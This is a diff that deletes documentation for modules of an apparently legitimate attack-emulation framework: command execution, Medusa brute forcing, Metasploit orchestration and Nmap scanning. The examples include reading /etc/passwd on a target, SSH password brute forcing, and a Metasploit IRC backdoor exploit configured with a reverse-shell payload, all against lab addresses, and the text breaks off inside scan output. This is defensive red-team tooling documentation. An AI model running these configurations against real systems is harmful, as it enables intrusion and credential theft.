- -### example.py -Is a set of predefined parameters that should allow the user to test if the module works as intended. - -Example: - -```python -from mod import execute, validate - -args = { - "argument1": "value1", - "argument2": "value2" -} - -validate_output = validate(args) -print(f"validate output: {validate_output}") - -execute_output = execute(args) -print(f"execute output: {execute_output}") - - -``` diff --git a/docs/2022.2/modules/mod_cmd.md b/docs/2022.2/modules/mod_cmd.md deleted file mode 100644 index b731416030e40e29d6238490f833f29e0853b662..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_cmd.md +++ /dev/null @@ -1,70 +0,0 @@ -# mod_cmd - -Module for running shell commands (depending on the shell used). When specifying "use_session" or "use_named_session", the command will be executed in the respective sessions context. - -## System requirements - -There are no system requirements. - -### For use with sessions only - -For this module to function properly, [Metasploit-framework](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) needs to be installed. - -After a successful installation of Metasploit-framework, you need to load msgrpc plugin. Easiest way to do this to open your terminal and run `msfrpcd` with `-P toor` to use password and `-S` to turn off SSL (depending on configuration in Worker config file). - -**Optional:** - -Another option is to run Metasploit using `msfconsole` and load msgrpc plugin using this command: - -````bash -load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true -```` - -This is just default, feel free to change the parameters to suit your needs, but keep in mind that they must match your worker config file. - -After successfully loading the msgrpc plugin, you are all set and ready to use this module. - - -## Input parameters - -Description of input parameters for module. 
- -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|-----------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `cmd` | Yes | cat /etc/passwd | string | - | The command for execution. | -| `end_checks` | No | \[root, admin\] | list | - | List of strings that are checked regularly to determine whether the command execution finished. It can also be used, for example, to make sure that the script has run completely, if you put a string at the end of it, which you will then check using this parameter. | -| `session_id` | No | 1 | int | - | Msf session in which the command should be executed. | -| `timeout` | No | 60 | int | - | Timeout for the command **in seconds** | -| `serialized_output` | No | true | string | false | Flag whether you want to return the result of the command in `serialized_output`, so that it could be used as input in other modules. **NOTICE: output of the command muse be valid JSON with this option enabled.** | - -**NOTICE: This module can use existing sessions with our [Cryton session management](https://cryton.gitlab-pages.ics.muni.cz/cryton-project/1.0/scenario/#session-management) feature.** - -### Example yaml(s) - -```yaml -module_arguments: - cmd: cat /etc/passwd; echo end_check_string - end_checks: - - end_check_string - session_id: 1 -``` - -## Output - -Description of module output. 
- -| Parameter name | Parameter description | -|---------------------|----------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from the command or any errors that can occur during module execution | -| `serialized_output` | Serialized script output in JSON that can accessed in other modules as input | - -### Example - -```json lines -{ - 'return_code': 0, - 'output': 'contents of passwd file on target', - 'serialized_output': None -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_medusa.md b/docs/2022.2/modules/mod_medusa.md deleted file mode 100644 index 25c0051bf7f6f3b751294e7685a7382c2ff52f68..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_medusa.md +++ /dev/null @@ -1,97 +0,0 @@ -# mod_medusa - -This module implements attacking capabilities of Medusa bruteforce tool. - -## System requirements - -System requirements (those not listed in requirements.txt for python). - -For this module to function properly, [Medusa](https://www.kali.org/tools/medusa/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|----------------|----------|---------------|-----------|---------------|----------------------------------------------------------------| -| `target` | Yes | 127.0.0.1 | string | - | Bruteforce target. | -| `mod` | No | ftp | string | ssh | Specified mod(service) you want to use to attack. | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Medusa. | -| `credentials` | No | false | dict | - | Parameters that can be used under this key are in table below. | -| `tasks` | No | false | int | 4 | Total number of login pairs to be tested concurrently. 
| - - -Parameters that can be used under `credentials`. - -| Parameter name | Parameter description | -|-----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `username` | Username to use for bruteforce | -| `password` | Password to use for bruteforce | -| `username_list` | Absolute path to file with usernames (default is username wordlist in mod folder) | -| `password_list` | Absolute path to file with passwords (default is password wordlist in mod folder) | -| `combo_list` | Absolute path to file with login pairs - user:password (official format can be found in http://foofus.net/goons/jmk/medusa/medusa.html). **Cannot be combined with other input parameters under `credentials`!** | - -### Parameters with custom Medusa command - -| Parameter name | Parameter description | -|----------------|-----------------------------------------------------------------------------------------------------| -| `command` | Medusa command with syntax as in command line. **Cannot be combined with other input parameters!** | - -## Example yaml(s) - -### Example with predefined inputs -```yaml -module_arguments: - target: CHANGE ME - raw_output: true - credentials: - username: vagrant - password: vagrant - tasks: 4 -``` - -```yaml -module_arguments: - target: CHANGE ME - credentials: - combo_list: absolute/path/to/file - tasks: 4 -``` - -### Example with custom command -```yaml -module_arguments: - command: medusa -t 4 -u vagrant -p vagrant -h <target> -M ssh -``` - -## Output - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from Medusa or any errors that can occur during module execution. 
| -| `serialized_output` | Serialized Medusa output to JSON that can accessed in other modules as input. | - -### serialized_output - -Description of `serialized_output` output parameter - -| Parameter name | Parameter description | -|-------------------|--------------------------------------------------------------------------| -| `username` | First username found during bruteforce. | -| `password` | First password found during bruteforce. | -| `all_credentials` | List of dictionaries containing all the credentials found in bruteforce. | - -### Example - -```json lines -{ - 'return_code': 0, - 'output': 'Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>\n\nACCOUNT CHECK: [ssh] Host: 192.168.56.3 (1 of 1, 0 complete) User: vagrant (1 of 1, 0 complete) Password: vagrant (1 of 1 complete)\nACCOUNT FOUND: [ssh] Host: 192.168.56.3 User: vagrant Password: vagrant [SUCCESS]\n', - 'serialized_output': {'username': 'vagrant', 'password': 'vagrant', 'all_credentials': [{'username': 'vagrant', 'password': 'vagrant'}]} -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_msf.md b/docs/2022.2/modules/mod_msf.md deleted file mode 100644 index eb6add1e942675f19ab801efeba1b19430b42a34..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_msf.md +++ /dev/null @@ -1,90 +0,0 @@ -# mod_msf - -Module for orchestrating Metasploit Framework. - -## System requirements - -For this module to function properly, [Metasploit-framework](https://www.kali.org/tools/metasploit-framework/) needs to be installed. - -After a successful installation of Metasploit-framework, you need to load MSFRPCD plugin. Easiest way to do this to open your terminal and run `msfrpcd` with `-P toor` to use password and `-S` to turn off SSL (depending on configuration in Worker config file). 
- -**Optional:** - -Another option is to run Metasploit using `msfconsole` and load msgrpc plugin using this command: - -````bash -load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true -```` - -This is just default, feel free to change the parameters to suit your needs, but keep in mind that they must match your worker config file. - -After successfully loading the msgrpc plugin, you are all set and ready to use this module. - -## Input parameters - -Description of input parameters for module. - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|-------------------|-----------------------------------------|------------------------------------|-----------|----------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | No | 127.0.0.1 | string | default value is taken from Non-case sensitive `RHOSTS` or `RHOST` option in `module_optons` | IP address of the target for matching metasploit session purposes. | -| `module_type` | Yes | exploit | string | - | Type of the msf module (valid values: `exploit`, `post`, `encoder`, `auxiliary`, `nop`, `payload`). | -| `module` | Yes | unix/irc/unreal_ircd_3281_backdoor | string | - | Name of metasploit module. | -| `module_options` | Yes | {"RHOSTS": "127.0.0.1"} | dict | - | Custom dictionary with options for the given module | -| `payload` | Yes (only for `module_type`: `exploit`) | cmd/unix/reverse_perl | string | - | Name of the payload to use in combination with the given module. 
| -| `payload_options` | Yes (only with defined `payload`) | {"LHOST": "127.0.0.1"} | dict | - | Custom dictionary with options for the given payload. | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Metasploit. | -| `wait_for_result` | No | false | bool | true | Boolean value (True or False) whether the module should be executed as background job. If False the module is executed without waiting for the job to finish. Be aware, that then the console output of the module's execution may not be fully captured. If this option is set to True, then the module waits until the job is completed and the output of the module is fully captured. | -| `module_timeout` | No | 120 | int | 60 | Number of seconds to wait before the module execution will be terminated. | -| `module_retries` | No | 3 | int | 1 | Defines how many times should metasploit module try to be executed, if it didn't finish successfully until the `module_timeout`is reached. | - - -**NOTICE: This module can use existing sessions with our [Cryton session management](https://cryton.gitlab-pages.ics.muni.cz/cryton-project/1.0/scenario/#session-management) feature.** - -### Example with payload - -```yaml -module_arguments: - module_type: exploit - module: unix/irc/unreal_ircd_3281_backdoor - module_options: - RHOSTS: CHANGE ME - RPORT: 6697 - payload: cmd/unix/reverse_perl - payload_options: - LHOST: 172.28.128.3 - LPORT: 4444 - exploit_timeout_in_sec: 15 - exploit_retries: 5 -``` - -### Example without payload - -```yaml -module_arguments: - module_type: auxiliary - module: scanner/ssh/ssh_login - module_options: - RHOSTS: CHANGE ME - USERNAME: vagrant - PASSWORD: vagrant -``` - -## Output - -Description of module output. 
- -| Parameter name | Parameter description | -|---------------------|---------------------------------------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from Metasploit or any errors that can occur during module execution. | -| `serialized_output` | **Only available when the metasploit module creates a session.** Dictionary in form of `{'session_id': '1'}`. | - -### Example -```json lines -{ - 'return_code': 0, - 'output': "VERBOSE => True\nBRUTEFORCE_SPEED => 5\nBLANK_PASSWORDS => false\nUSER_AS_PASS => false\nDB_ALL_CREDS => false\nDB_ALL_USERS => false\nDB_ALL_PASS => false\nDB_SKIP_EXISTING => none\nSTOP_ON_SUCCESS => false\nREMOVE_USER_FILE => false\nREMOVE_PASS_FILE => false\nREMOVE_USERPASS_FILE => false\nTRANSITION_DELAY => 0\nMaxGuessesPerService => 0\nMaxMinutesPerService => 0\nMaxGuessesPerUser => 0\nCreateSession => true\nAutoVerifySession => true\nTHREADS => 1\nShowProgress => true\nShowProgressPercent => 10\nRPORT => 22\nSSH_IDENT => SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\nSSH_TIMEOUT => 30\nSSH_DEBUG => false\nGatherProof => true\nRHOSTS => 192.168.56.51\nUSERNAME => vagrant\nPASSWORD => vagrant\nDisablePayloadHandler => True\n[*] 192.168.56.51:22 - Starting bruteforce\n[+] 192.168.56.51:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) Linux vagrant-ubuntu-trusty-64 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux '\n[!] 
No active DB -- Credential data will not be saved!\n[*] SSH session 1 opened (192.168.56.50:36169 -> 192.168.56.51:22) at 2022-08-04 17:03:56 +0200\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n", - 'serialized_output': {'session_id': '1'} -} - -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_nmap.md b/docs/2022.2/modules/mod_nmap.md deleted file mode 100644 index acfad8ee6825d70073c26e535ee58fe2cffe329f..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_nmap.md +++ /dev/null @@ -1,119 +0,0 @@ -# mod_nmap - -This module implements scanning capabilities of Nmap. - -It is scanning target's ports. By default, it scans the most common ports and returns a list with all ports and their parameters. - -## System requirements - -For this module to function properly, [Nmap](https://www.kali.org/tools/nmap/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|-------------------|----------|----------------------------------------------------------|-----------|----------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | Yes | 127.0.0.1 | string | - | Scan target. | -| `ports` | No | [1-300, 443] | array | scans top 100 common ports (--top-ports 100) | List of individual ports or range of ports to be scanned. | -| `port_parameters` | No | all the possible parameters are [here](#port-parameters) | dict | - | Check if found ports match your desired parameters. If the port with desired parameters is not found, the module will result in failure (`return_code: -1`). | -| `options` | No | -T4 -sV | string | - | Additional Nmap parameters. 
| -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Nmap scan. | -| `timeout` | No | 30 | int | 60 | Timeout for nmap scan | - - -### Parameters with custom nmap command - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|----------------------------------------------------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `command` | Yes | nmap -T4 127.0.0.1 | string | - | Custom nmap command like in command line. | -| `serialized_output` | No | false | bool | true | Option to serialize raw output to JSON, this option will add `-oX -` parameter to the command(if not already there) for xml output needed for serialization. | -| `port_parameters` | No | all the possible parameters are [here](#port-parameters) | dict | - | Check if found ports match your desired parameters. If the port with desired parameters is not found, the module will result in failure (`return_code: -1`). | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Nmap scan. | -| `timeout` | No | 30 | int | 60 | Timeout for nmap scan | - - -### Port parameters -Example of all possible options for `port_parameters`. -```yaml ---- -protocol: tcp -portid: '22' -state: open -reason: syn-ack -reason_ttl: '0' -service: - name: ssh - product: OpenSSH - version: 6.6.1p1 Ubuntu 2ubuntu2.13 - extrainfo: Ubuntu Linux; protocol 2.0 - ostype: Linux - method: probed - conf: '10' -cpe: -- cpe:/a:openbsd:openssh:6.6.1p1 -- cpe:/o:linux:linux_kernel -scripts: [] -``` -All options try to find string in the nmap serialized output, and they are non-case sensitive. For example if the `cpe` in the nmap output would be cpe:/o:linux:linux_kernel, `cpe: -linux` in `port_parameters` would match it successfully. 
- -## Output parameters - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output of Nmap scan or any errors that can occur during module execution. | -| `serialized_output` | Serialized Nmap output in JSON that can accessed in other modules as input. | - -## Example yaml(s) with their outputs - -### Example with predefined inputs -```yaml -module_arguments: - target: CHANGE ME - ports: - - 1-30 - - 80 - port_parameters: - - protocol: tcp - portid: '80' - state: open - reason: syn-ack - reason_ttl: '0' - service: - name: http - product: Apache httpd - version: 2.4.7 - method: probed - conf: '10' - cpe: - - apache - options: -T4 -sV -``` - -```json lines -{ - 'return_code': 0, - 'serialized_output': {'192.168.56.3': {'osmatch': {}, 'ports': [{'protocol': 'tcp', 'portid': '21', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ftp', 'product': 'ProFTPD', 'version': '1.3.5', 'ostype': 'Unix', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:proftpd:proftpd:1.3.5'}], 'scripts': []}, {'protocol': 'tcp', 'portid': '22', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ssh', 'product': 'OpenSSH', 'version': '6.6.1p1 Ubuntu 2ubuntu2.13', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:openbsd:openssh:6.6.1p1'}, {'cpe': 'cpe:/o:linux:linux_kernel'}], 'scripts': []}, {'protocol': 'tcp', 'portid': '80', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'http', 'product': 'Apache httpd', 'version': '2.4.7', 'hostname': '127.0.2.1', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:apache:http_server:2.4.7'}], 'scripts': []}], 'hostname': [], 'macaddress': None, 'state': {'state': 'up', 'reason': 'syn-ack', 
'reason_ttl': '0'}}, 'stats': {'scanner': 'nmap', 'args': '/usr/bin/nmap -oX - -T4 -sV -p-29,80 192.168.56.3', 'start': '1660830754', 'startstr': 'Thu Aug 18 15:52:34 2022', 'version': '7.92', 'xmloutputversion': '1.05'}, 'runtime': {'time': '1660830775', 'timestr': 'Thu Aug 18 15:52:55 2022', 'summary': 'Nmap done at Thu Aug 18 15:52:55 2022; 1 IP address (1 host up) scanned in 21.05 seconds', 'elapsed': '21.05', 'exit': 'success'}}, - 'output': '<nmaprun scanner="nmap" args="/usr/bin/nmap -oX - -T4 -sV -p-29,80 192.168.56.3" start="1660830754" startstr="Thu Aug 18 15:52:34 2022" version="7.92" xmloutputversion="1.05">\n<scaninfo type="connect" protocol="tcp" numservices="30" services="1-29,80" />\n<verbose level="0" />\n<debugging level="0" />\n<hosthint><status state="up" reason="unknown-response" reason_ttl="0" />\n<address addr="192.168.56.3" addrtype="ipv4" />\n<hostnames>\n</hostnames>\n</hosthint>\n<host starttime="1660830767" endtime="1660830775"><status state="up" reason="syn-ack" reason_ttl="0" />\n<address addr="192.168.56.3" addrtype="ipv4" />\n<hostnames>\n</hostnames>\n<ports><extraports state="filtered" count="27">\n<extrareasons reason="no-response" count="27" proto="tcp" ports="1-20,23-29" />\n</extraports>\n<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="ftp" product="ProFTPD" version="1.3.5" ostype="Unix" method="probed" conf="10"><cpe>cpe:/a:proftpd:proftpd:1.3.5</cpe></service></port>\n<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="ssh" product="OpenSSH" version="6.6.1p1 Ubuntu 2ubuntu2.13" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:6.6.1p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service></port>\n<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="http" product="Apache httpd" version="2.4.7" hostname="127.0.2.1" 
method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.7</cpe></service></port>\n</ports>\n<times srtt="464" rttvar="1667" to="100000" />\n</host>\n<runstats><finished time="1660830775" timestr="Thu Aug 18 15:52:55 2022" summary="Nmap done at Thu Aug 18 15:52:55 2022; 1 IP address (1 host up) scanned in 21.05 seconds" elapsed="21.05" exit="success" /><hosts up="1" down="0" total="1" />\n</runstats>\n</nmaprun>' -} -``` - -### Example with custom command -```yaml -module_arguments: - command: nmap -A -T4 --top-ports 100 <target> - timeout: 20 -``` - -```json lines -{ - 'return_code': 0, - 'serialized_output': {'192.168.56.51': {'osmatch': {}, 'ports': [{'protocol': 'tcp', 'portid': '22', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ssh', 'product': 'OpenSSH', 'version': '6.6.1p1 Ubuntu 2ubuntu2.13', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:openbsd:openssh:6.6.1p1'}, {'cpe': 'cpe:/o:linux:linux_kernel'}], 'scripts': [{'name': 'ssh-hostkey', 'raw': '\n 1024 c7:23:04:56:47:12:29:44:cd:b5:47:f7:5a:cb:ad:6b (DSA)\n 2048 ab:d9:26:30:04:cd:99:ee:2c:f2:33:82:cd:2d:28:67 (RSA)\n 256 80:e7:ff:d4:4d:83:fb:e8:9f:69:27:68:bd:05:d4:2b (ECDSA)\n 256 61:36:ed:35:89:45:08:e0:85:da:45:05:9f:70:ed:15 (ED25519)', 'data': {'children': [{'fingerprint': 'c723045647122944cdb547f75acbad6b', 'type': 'ssh-dss', 'key': 
'AAAAB3NzaC1kc3MAAACBAO9HtEJnY/fqKHmaAw+ycL4gHrICR7T/1JL5lpm0drDcrZtWI/mDhDiICba8yZlQrELAhnsP9yQf0AtRDiAA8zOqFw/55RdejvvUzWWUTI+5shisefPHbSRzHrJsO9khVR9gbDkirdGnOvjzi4qIHsqOPW6ji6/WhBWmjAKOWjr1AAAAFQDeFPBoAJqvJf+dPA1d3v+pH/VVpQAAAIEA3XepPB0Uo4M6J4UYCsX+Lu8SWujQ0AOSm9jQqmVQpD9sjnBWnAUP7ScUoSX1om7GadlZLMWT4GM3ljq3fQ+tNh/hejenJioTfnYY1BLlwpiqpNq9kU4JyF5vq1ZXdOPPKwJar52IDQf+p6M9fMtHrRgLVqXt5eHUWFDCiyxRi6kAAACBAL8lNl2BPKTyk66pGaKyUOBKw030K+2KPCdsupfzKS6oa5ZUWLSv2xToq0mKCLa+AcIr3yCS+q/v0oS85GawG56s5aQ9qNAlQbqDXqM/5TJx7xv57uDsZH5dNzyAEIM/+FjoiT6acQHFQ+DHRMrWwTuU3nHi5BF5k31/DflS8h+J', 'bits': '1024'}, {'fingerprint': 'abd9263004cd99ee2cf23382cd2d2867', 'type': 'ssh-rsa', 'key': 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDjroBPHxLTl8UXL2r6HHW9Hcj+p2J4uUJh3k7ULVR8/aTRnJxyUfCPDway/lyoa2tY5qtiAF8k4tI53o7cCNnzL/aRW+w3PHIWGaYyI8VmNQxKKvQqcorML5UUaif9H3nTIN6+MIK+bxWMOnjq9vMnz4lzDYp6JX5Ra1LzflhmYHhnVVHA1JUuERp2MzN5OC3QJ+YaOCYYkbuY+GIn/SV+tcTbVXvpj6Dk3IQAQx1plQLbjcLda3wJjB+Umb+Xr/YkrKGvlWJTjc75I1+qIT4IJ1bKeecERHnT/IPpg8w7CDv3mHTlhW3fA9I3D3YElh21C/RFzwaGbOFP5q5pdunP', 'bits': '2048'}, {'fingerprint': '80e7ffd44d83fbe89f692768bd05d42b', 'type': 'ecdsa-sha2-nistp256', 'key': 'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPkR0kyR7nNOBkue6qsy995GPdpnlnrsbDMkm/8lrx8dTkg+xg5exjZcQeATsNgMbzvwAcm4NXEMg3RNiLAJ4Zo=', 'bits': '256'}, {'fingerprint': '6136ed35894508e085da45059f70ed15', 'type': 'ssh-ed25519', 'key': 'AAAAC3NzaC1lZDI1NTE5AAAAIJIkt1AlQN1PvvvgH6AgQjroOF2iIYTC0QFqP0Kfx9bC', 'bits': '256'}]}}]}, {'protocol': 'tcp', 'portid': '111', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'rpcbind', 'version': '2-4', 'extrainfo': 'RPC #100000', 'method': 'probed', 'conf': '10'}, 'cpe': [], 'scripts': [{'name': 'rpcinfo', 'raw': '\n program version port/proto service\n 100000 2,3,4 111/tcp rpcbind\n 100000 2,3,4 111/udp rpcbind\n 100000 3,4 111/tcp6 rpcbind\n 100000 3,4 111/udp6 rpcbind\n 100024 1 34829/tcp status\n 100024 1 35465/udp status\n 100024 1 38358/udp6 
status\n 100024 1 41647/tcp6 status\n', 'data': {'100024': {'tcp6': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '41647', 'owner': '107', 'addr': '::'}]}, 'udp': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '35465', 'owner': '107', 'addr': '0.0.0.0'}]}, 'udp6': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '38358', 'owner': '107', 'addr': '::'}]}, 'tcp': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '34829', 'owner': '107', 'addr': '0.0.0.0'}]}}, '100000': {'udp': {'version': {'children': [{0: '2', 1: '3', 2: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '0.0.0.0'}]}, 'local': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'addr': '/run/rpcbind.sock', 'owner': 'superuser'}]}, 'tcp6': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '::'}]}, 'udp6': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '::'}]}, 'tcp': {'version': {'children': [{0: '2', 1: '3', 2: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '0.0.0.0'}]}}}}]}], 'hostname': [], 'macaddress': None, 'state': {'state': 'up', 'reason': 'conn-refused', 'reason_ttl': '0'}}, 'stats': {'scanner': 'nmap', 'args': 'nmap -oX - -A -T4 --top-ports 100 192.168.56.51', 'start': '1660741353', 'startstr': 'Wed Aug 17 15:02:33 2022', 'version': '7.92', 'xmloutputversion': '1.05'}, 'runtime': {'time': '1660741360', 'timestr': 'Wed Aug 17 15:02:40 2022', 'summary': 'Nmap done at Wed Aug 17 15:02:40 2022; 1 IP address (1 host up) scanned in 7.65 seconds', 'elapsed': '7.65', 'exit': 'success'}}, - 'output': '<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE nmaprun>\n<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>\n<!-- Nmap 7.92 scan initiated Wed Aug 17 15:02:33 2022 as: nmap -oX - -A -T4 --top-ports 100 192.168.56.51 -->\n<nmaprun scanner="nmap" args="nmap -oX - -A -T4 
--top-ports 100 192.168.56.51" start="1660741353" startstr="Wed Aug 17 15:02:33 2022" version="7.92" xmloutputversion="1.05">\n<scaninfo type="connect" protocol="tcp" numservices="100" services="7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157"/>\n<verbose level="0"/>\n<debugging level="0"/>\n<hosthint><status state="up" reason="unknown-response" reason_ttl="0"/>\n<address addr="192.168.56.51" addrtype="ipv4"/>\n<hostnames>\n</hostnames>\n</hosthint>\n<host starttime="1660741353" endtime="1660741360"><status state="up" reason="conn-refused" reason_ttl="0"/>\n<address addr="192.168.56.51" addrtype="ipv4"/>\n<hostnames>\n</hostnames>\n<ports><extraports state="closed" count="98">\n<extrareasons reason="conn-refused" count="98" proto="tcp" ports="7,9,13,21,23,25-26,37,53,79-81,88,106,110,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157"/>\n</extraports>\n<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="6.6.1p1 Ubuntu 2ubuntu2.13" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:6.6.1p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="
 1024 c7:23:04:56:47:12:29:44:cd:b5:47:f7:5a:cb:ad:6b (DSA)
 2048 ab:d9:26:30:04:cd:99:ee:2c:f2:33:82:cd:2d:28:67 (RSA)
 256 80:e7:ff:d4:4d:83:fb:e8:9f:69:27:68:bd:05:d4:2b (ECDSA)
 256 61:36:ed:35:89:45:08:e0:85:da:45:05:9f:70:ed:15 (ED25519)"><table>\n<elem key="fingerprint">c723045647122944cdb547f75acbad6b</elem>\n<elem key="type">ssh-dss</elem>\n<elem key="key">AAAAB3NzaC1kc3MAAACBAO9HtEJnY/fqKHmaAw+ycL4gHrICR7T/1JL5lpm0drDcrZtWI/mDhDiICba8yZlQrELAhnsP9yQf0AtRDiAA8zOqFw/55RdejvvUzWWUTI+5shisefPHbSRzHrJsO9khVR9gbDkirdGnOvjzi4qIHsqOPW6ji6/WhBWmjAKOWjr1AAAAFQDeFPBoAJqvJf+dPA1d3v+pH/VVpQAAAIEA3XepPB0Uo4M6J4UYCsX+Lu8SWujQ0AOSm9jQqmVQpD9sjnBWnAUP7ScUoSX1om7GadlZLMWT4GM3ljq3fQ+tNh/hejenJioTfnYY1BLlwpiqpNq9kU4JyF5vq1ZXdOPPKwJar52IDQf+p6M9fMtHrRgLVqXt5eHUWFDCiyxRi6kAAACBAL8lNl2BPKTyk66pGaKyUOBKw030K+2KPCdsupfzKS6oa5ZUWLSv2xToq0mKCLa+AcIr3yCS+q/v0oS85GawG56s5aQ9qNAlQbqDXqM/5TJx7xv57uDsZH5dNzyAEIM/+FjoiT6acQHFQ+DHRMrWwTuU3nHi5BF5k31/DflS8h+J</elem>\n<elem key="bits">1024</elem>\n</table>\n<table>\n<elem key="fingerprint">abd9263004cd99ee2cf23382cd2d2867</elem>\n<elem key="type">ssh-rsa</elem>\n<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQDjroBPHxLTl8UXL2r6HHW9Hcj+p2J4uUJh3k7ULVR8/aTRnJxyUfCPDway/lyoa2tY5qtiAF8k4tI53o7cCNnzL/aRW+w3PHIWGaYyI8VmNQxKKvQqcorML5UUaif9H3nTIN6+MIK+bxWMOnjq9vMnz4lzDYp6JX5Ra1LzflhmYHhnVVHA1JUuERp2MzN5OC3QJ+YaOCYYkbuY+GIn/SV+tcTbVXvpj6Dk3IQAQx1plQLbjcLda3wJjB+Umb+Xr/YkrKGvlWJTjc75I1+qIT4IJ1bKeecERHnT/IPpg8w7CDv3mHTlhW3fA9I3D3YElh21C/RFzwaGbOFP5q5pdunP</elem>\n<elem key="bits">2048</elem>\n</table>\n<table>\n<elem key="fingerprint">80e7ffd44d83fbe89f692768bd05d42b</elem>\n<elem key="type">ecdsa-sha2-nistp256</elem>\n<elem 